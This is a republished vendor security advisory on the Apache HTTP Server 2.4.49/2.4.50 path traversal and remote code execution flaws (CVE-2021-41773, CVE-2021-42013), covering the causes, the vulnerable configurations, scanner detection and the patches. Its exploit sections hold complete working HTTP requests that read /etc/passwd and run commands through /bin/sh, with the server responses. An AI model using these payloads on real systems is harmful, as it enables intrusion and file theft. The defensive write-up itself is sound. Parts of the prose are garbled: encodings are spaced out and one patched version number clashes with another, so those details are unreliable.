Apache HTTP server path traversal and remote code execution (CVE-2021-41773 and CVE-2021-42013)

On October 4, 2021, the Apache HTTP Server project published a security advisory on a path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 and 2.4.50 followed as CVE-2021-41773 and CVE-2021 -42013. In the advisory, Apache also pointed out “the issue is known to be exploited in the wild” and later it was identified that the vulnerability can be exploited to perform remote code execution. To exploit both vulnerabilities, the Apache HTTP server must be running in a different configuration than the default.

Since vulnerabilities are configuration dependent, checking the version of the Apache web server is not sufficient to identify vulnerable servers. With both CVEs being actively exploited, Qualys Web Application Scanning has published QID 150372, 150373, 150374 which sends a specially crafted HTTP request to the target server to determine if it is exploitable. Once successfully detected, users can remediate the vulnerabilities by upgrading to Apache HTTP Server 2.4.51 or higher.

About CVE-2021-41773

According to CVE-2021-41773, Apache HTTP Server 2.4.49 is vulnerable to traversal and remote code execution attacks.

Pathway analysis

The path traversal vulnerability was introduced due to the new code change added for the normalization of paths, i.e. for URL paths to remove unwanted or dangerous parts of the path name, but it was inadequate to detect the different encoding techniques for dot-dot-slash (../) “path traversal characters

To prevent path traversal attacks, the normalization function, which is responsible for resolving URL encoded values ​​from the requested URI, resolved the Unicode values ​​one by one. Therefore, when the URL encodes the second dot as% 2e, the logic fails to recognize% 2e as a dot and therefore does not decode it, this converts the characters ../ to.% 2e / and bypass verification.

In addition to bypassing the path traversal check, for an Apache HTTP server to be vulnerable, the HTTP server configuration must either contain the directory directive for the entire server file system like Require All Granted, or the directory directive must be completely absent from the configuration file.

Vulnerable configuration:

Require all granted

Therefore, bypassing the dot-dot check as.% 2e and chaining it with an incorrectly configured directory directive allows an attacker to read arbitrary files such as passwd from the vulnerable server’s file system.

Operation: Path crossing

Request:

GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Reply:

HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 08:13:02 GMT
Server: Apache/2.4.49 (Unix)
Last-Modified: Mon, 27 Sep 2021 00:00:00 GMT
ETag: "39e-5cceec7356000"
Accept-Ranges: bytes
Content-Length: 926
Connection: close
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

Please note that the default Apache HTTP server configuration has the entire filesystem directory directive configured as Require All Denied and therefore is not vulnerable.

Remote code execution analysis

While CVE-2021-41773 was originally documented as Path traversal and File disclosure vulnerability, further research concluded that the vulnerability can be further exploited to perform remote code execution when the mod_cgi module is enabled on the Apache HTTP server, this allows an attacker exploit the path traversal vulnerability and invoke any binary on the system using HTTP POST requests.

Configuration to activate the mod_cgi module:

LoadModule cgid_module modules/mod_cgid.so

By default the mod_cgi module is disabled on the Apache HTTP server by commenting out the above line in the configuration file. Consequently, when mod_cgi is enabled and the “Require all grant” configuration is applied to the directory directive of the filesystem, an attacker can execute remote commands on the Apache server.

Operation: remote code execution

Request:

POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Content-Length: 7
Content-Type: application/x-www-form-urlencoded
Connection: close
echo;id

Reply:

HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 09:58:23 GMT
Server: Apache/2.4.49 (Unix)
Connection: close
Content-Length: 45
uid=1(daemon) gid=1(daemon) groups=1(daemon)

Looking at the HTTP POST request for RCE, we can understand that / bin / sh is the system binary that executes the echo; id payload and displays the output of the id command in response.

About CVE-2021-42013

CVE-2021-42013 was introduced because the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient because it did not cover double URL encoding, so the vulnerable configurations remained the same but the payload used in 2.4. 49 was a double URL encoded in 2.4 .50 to administer the same path traversal and remote code execution attack.

The attack in 2.4.49 initially encoded the second dot (.) In% 2e and the same was a double URL encoded in %% 32% 65 for version 2.4.50


Encoding analysis

Conversion: point →% 2e → %% 32% 65

  • 2 is coded in% 32

  • e is coded in% 65

  • And% original left as is

So a dot equals %% 32% 65 which ultimately converts ../ to the double url encoding format to %% 32% 65 %% 32% 65 /

Operation: Path crossing

Request:

GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Reply:

HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 10:16:51 GMT
Server: Apache/2.4.50 (Unix)
Last-Modified: Mon, 27 Sep 2021 00:00:00 GMT
ETag: "39e-5cceec7356000"
Accept-Ranges: bytes
Content-Length: 926
Connection: close
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

Operation: remote code execution

Request:

POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
echo;id

Reply:

HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 10:42:40 GMT
Server: Apache/2.4.50 (Unix)
Connection: close
Content-Length: 45
uid=1(daemon) gid=1(daemon) groups=1(daemon)

Detect vulnerabilities with Qualys WAS

Customers can detect these vulnerabilities with Qualys Web Application Scanning using the following QIDs:

  • 150372: Traverse of Apache HTTP server path (CVE-2021-41773)

  • 150373: Remote code execution of the Apache HTTP server (CVE-2021-41773)

  • 150374: Multiple vulnerabilities of the Apache HTTP server (CVE-2021-42013)

QID 150372 – Traverse of Apache HTTP Server Path (CVE-2021-41773)

Report

After the vulnerability is successfully detected by Qualys WAS, users will see similar results for QID 150372 in the vulnerability scan report:

Solution

Organizations using Apache HTTP Server 2.4.49 or 2.4.50 are recommended to upgrade to HTTP Server 2.5.51 or later to patch CVE-2021-41773 and CVE-2021-42013, more information can be viewed in the Apache security advisory.

To maintain best security practices, Qualys also advises users to ensure that:

  • The mod_cgi module is disabled by default, unless the company requires it.

  • Filesystem directory directive to update with Require All Denied as shown below:

Require all denied

Credits

Apache Security Advisory:

https://httpd.apache.org/security/vulnerabilities_24.html

CVE details:

https://nvd.nist.gov/vuln/detail/CVE-2021-41773
https://nvd.nist.gov/vuln/detail/CVE-2021-42013

Credits for vulnerability discovery go to:

  • Ash Daulton and the cPanel Security Team

  • Juan Escobar of Dreamlab Technologies

  • Fernando Muñoz from the NULL Life CTF team

  • Shungo Kumasaka and Nattapon Jongcharoen

The references:

Donor

Jyoti Raval, Senior Web Application Security Analyst, Qualys


Related

Disclaimer

Qualys inc. published this content on October 27, 2021 and is solely responsible for the information it contains. Distributed by Public, unedited and unmodified, on October 28, 2021 06:30:03 AM UTC.


Source link

Comments are closed.